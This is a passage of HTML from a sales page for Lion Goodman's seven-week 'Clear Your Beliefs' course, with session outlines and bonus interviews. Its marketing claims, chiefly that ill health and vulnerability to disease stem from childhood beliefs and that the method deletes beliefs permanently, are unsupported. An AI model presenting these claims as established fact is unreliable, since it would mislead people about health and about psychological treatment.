and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\n\n<strong>It''s that simple.</strong></p>\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n</p>\n<em>\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p><p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n<p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n&nbsp;\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n&nbsp;\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<strong> In Session 1, you will:</strong>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<strong> In Session 2, you will:</strong>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<strong> In Session 3, you will:</strong>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n&nbsp;\n\n<strong> In Session 4, you will:</strong>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n<strong> In Session 5, you will:</strong>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n<strong> In Session 6, you will:</strong>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n<strong> In Session 7, you will:</strong>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" 